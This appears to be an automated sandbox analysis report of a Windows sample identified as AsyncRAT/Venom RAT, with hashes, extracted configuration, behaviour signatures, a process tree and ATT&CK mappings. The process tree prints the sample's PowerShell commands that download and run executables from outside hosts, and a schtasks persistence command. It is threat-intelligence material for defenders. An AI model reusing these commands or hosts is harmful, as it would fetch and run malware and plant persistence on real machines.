Analysis

  • max time kernel
    151s
  • max time network
    160s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    18-04-2024 01:06

General

  • Target

    16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe

  • Size

    75KB

  • MD5

    a7d63348cfe9b0dc9d3aaec28c76c8f0

  • SHA1

    1b993f554960286e90cfd7cedf4c457e1c46ff80

  • SHA256

    16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54

  • SHA512

    3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

  • SSDEEP

    1536:XXkUaUdXCfRPMRkGWsrT/NGH1ba/KOjybwokzkHLVclN:XUUTNWPMRkGUH1baP+tkWBY

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu.exgaming.click

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu5.exgaming.click

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

Mutex

hoyqzolrquxmbnzaee

Attributes
  • delay

    1

  • install

    true

  • install_file

    system.exe

  • install_folder

    %AppData%

  • pastebin_config

    https://pastebin.com/raw/ckrnc4Uk

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Async RAT payload 1 IoCs
  • Detects executables attemping to enumerate video devices using WMI 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe
    "C:\Users\Admin\AppData\Local\Temp\16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2924
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3032
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2024
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1676
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2520
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:2452
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp90EA.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:2516
      • C:\Users\Admin\AppData\Roaming\system.exe
        "C:\Users\Admin\AppData\Roaming\system.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:852
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1116
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2600
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:788
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3028
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2092

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Scheduled Task/Job

1
T1053

Persistence

Scheduled Task/Job

1
T1053

Privilege Escalation

Scheduled Task/Job

1
T1053

Discovery

System Information Discovery

1
T1082

Query Registry

1
T1012

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmp90EA.tmp.bat
    Filesize

    150B

    MD5

    00270c5774ea0c6e5949a78b943ccc72

    SHA1

    18fbc58d6d05b39e8d31553fb2633a8cc528412e

    SHA256

    321399ceba3456dea60059e4310a6ab9502fef0e52effedb25e09f06e380e4a4

    SHA512

    3c372bbe5a638d2a15ff1234f1f6052fb8112ffde427399e9388d98cffe58567a865bd62060af4ffeb8d6ee8629416de419ab0f1a3f228bb23cb784a920db489

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    abb2cccc6670a56f36e87fa878aedc5f

    SHA1

    436a27fca95f2ffa3505d54c282acd7b7bdb91fb

    SHA256

    1ad53b2adc2a77e07ff102d2c678233fe41c0766208e3815f2b87923633e651b

    SHA512

    99e1f1b2a2e8860ac9aa952edc6f4c0da961b59fbd168f3fcf7bc8f477073348b3945465e861da5fbb630b88ca5dce468b34ef8886153fbd40ffebecd1bd9c28

  • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
    Filesize

    8B

    MD5

    cf759e4c5f14fe3eec41b87ed756cea8

    SHA1

    c27c796bb3c2fac929359563676f4ba1ffada1f5

    SHA256

    c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

    SHA512

    c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

  • C:\Users\Admin\AppData\Roaming\system.exe
    Filesize

    75KB

    MD5

    a7d63348cfe9b0dc9d3aaec28c76c8f0

    SHA1

    1b993f554960286e90cfd7cedf4c457e1c46ff80

    SHA256

    16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54

    SHA512

    3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

  • memory/788-99-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/788-79-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/788-80-0x00000000027F0000-0x0000000002870000-memory.dmp
    Filesize

    512KB

  • memory/788-83-0x00000000027F0000-0x0000000002870000-memory.dmp
    Filesize

    512KB

  • memory/788-81-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/788-84-0x00000000027F0000-0x0000000002870000-memory.dmp
    Filesize

    512KB

  • memory/788-90-0x00000000027F0000-0x0000000002870000-memory.dmp
    Filesize

    512KB

  • memory/852-47-0x000007FEEDDE0000-0x000007FEEE7CC000-memory.dmp
    Filesize

    9.9MB

  • memory/852-45-0x0000000000940000-0x0000000000958000-memory.dmp
    Filesize

    96KB

  • memory/852-59-0x0000000076D10000-0x0000000076EB9000-memory.dmp
    Filesize

    1.7MB

  • memory/852-48-0x0000000002140000-0x00000000021C0000-memory.dmp
    Filesize

    512KB

  • memory/852-89-0x000007FEEDDE0000-0x000007FEEE7CC000-memory.dmp
    Filesize

    9.9MB

  • memory/852-98-0x0000000002140000-0x00000000021C0000-memory.dmp
    Filesize

    512KB

  • memory/1676-91-0x0000000002470000-0x00000000024F0000-memory.dmp
    Filesize

    512KB

  • memory/1676-92-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/1676-93-0x0000000002470000-0x00000000024F0000-memory.dmp
    Filesize

    512KB

  • memory/1676-94-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/1676-95-0x0000000002470000-0x00000000024F0000-memory.dmp
    Filesize

    512KB

  • memory/1676-96-0x0000000002470000-0x00000000024F0000-memory.dmp
    Filesize

    512KB

  • memory/1676-97-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2024-78-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2024-67-0x00000000024A0000-0x0000000002520000-memory.dmp
    Filesize

    512KB

  • memory/2024-71-0x00000000024A0000-0x0000000002520000-memory.dmp
    Filesize

    512KB

  • memory/2024-70-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2024-66-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2024-68-0x00000000024A0000-0x0000000002520000-memory.dmp
    Filesize

    512KB

  • memory/2024-69-0x00000000024A0000-0x0000000002520000-memory.dmp
    Filesize

    512KB

  • memory/2296-3-0x000000001AE50000-0x000000001AED0000-memory.dmp
    Filesize

    512KB

  • memory/2296-16-0x0000000076D10000-0x0000000076EB9000-memory.dmp
    Filesize

    1.7MB

  • memory/2296-27-0x0000000076D10000-0x0000000076EB9000-memory.dmp
    Filesize

    1.7MB

  • memory/2296-1-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp
    Filesize

    9.9MB

  • memory/2296-0-0x0000000000010000-0x0000000000028000-memory.dmp
    Filesize

    96KB

  • memory/2296-26-0x000007FEF50B0000-0x000007FEF5A9C000-memory.dmp
    Filesize

    9.9MB

  • memory/2600-57-0x0000000002900000-0x0000000002980000-memory.dmp
    Filesize

    512KB

  • memory/2600-72-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2600-58-0x0000000002900000-0x0000000002980000-memory.dmp
    Filesize

    512KB

  • memory/2600-56-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2600-55-0x0000000002900000-0x0000000002980000-memory.dmp
    Filesize

    512KB

  • memory/2600-54-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2904-36-0x0000000002130000-0x0000000002138000-memory.dmp
    Filesize

    32KB

  • memory/2904-35-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2904-38-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2904-40-0x0000000002780000-0x0000000002800000-memory.dmp
    Filesize

    512KB

  • memory/2904-39-0x0000000002780000-0x0000000002800000-memory.dmp
    Filesize

    512KB

  • memory/2904-60-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
    Filesize

    9.6MB

  • memory/2904-37-0x0000000002780000-0x0000000002800000-memory.dmp
    Filesize

    512KB

  • memory/2904-41-0x0000000002780000-0x0000000002800000-memory.dmp
    Filesize

    512KB

  • memory/2904-34-0x000000001B330000-0x000000001B612000-memory.dmp
    Filesize

    2.9MB

  • memory/3028-106-0x0000000002590000-0x0000000002610000-memory.dmp
    Filesize

    512KB

  • memory/3028-111-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp
    Filesize

    9.6MB

  • memory/3028-109-0x0000000002590000-0x0000000002610000-memory.dmp
    Filesize

    512KB

  • memory/3028-110-0x0000000002590000-0x0000000002610000-memory.dmp
    Filesize

    512KB

  • memory/3028-107-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp
    Filesize

    9.6MB

  • memory/3028-108-0x0000000002590000-0x0000000002610000-memory.dmp
    Filesize

    512KB

  • memory/3028-105-0x000007FEF4760000-0x000007FEF50FD000-memory.dmp
    Filesize

    9.6MB

  • memory/3032-28-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp
    Filesize

    9.6MB

  • memory/3032-8-0x000000001B180000-0x000000001B462000-memory.dmp
    Filesize

    2.9MB

  • memory/3032-10-0x0000000001E30000-0x0000000001E38000-memory.dmp
    Filesize

    32KB

  • memory/3032-9-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp
    Filesize

    9.6MB

  • memory/3032-11-0x00000000025C0000-0x0000000002640000-memory.dmp
    Filesize

    512KB

  • memory/3032-12-0x000007FEED5A0000-0x000007FEEDF3D000-memory.dmp
    Filesize

    9.6MB

  • memory/3032-13-0x00000000025C0000-0x0000000002640000-memory.dmp
    Filesize

    512KB

  • memory/3032-14-0x00000000025C0000-0x0000000002640000-memory.dmp
    Filesize

    512KB

  • memory/3032-15-0x00000000025C0000-0x0000000002640000-memory.dmp
    Filesize

    512KB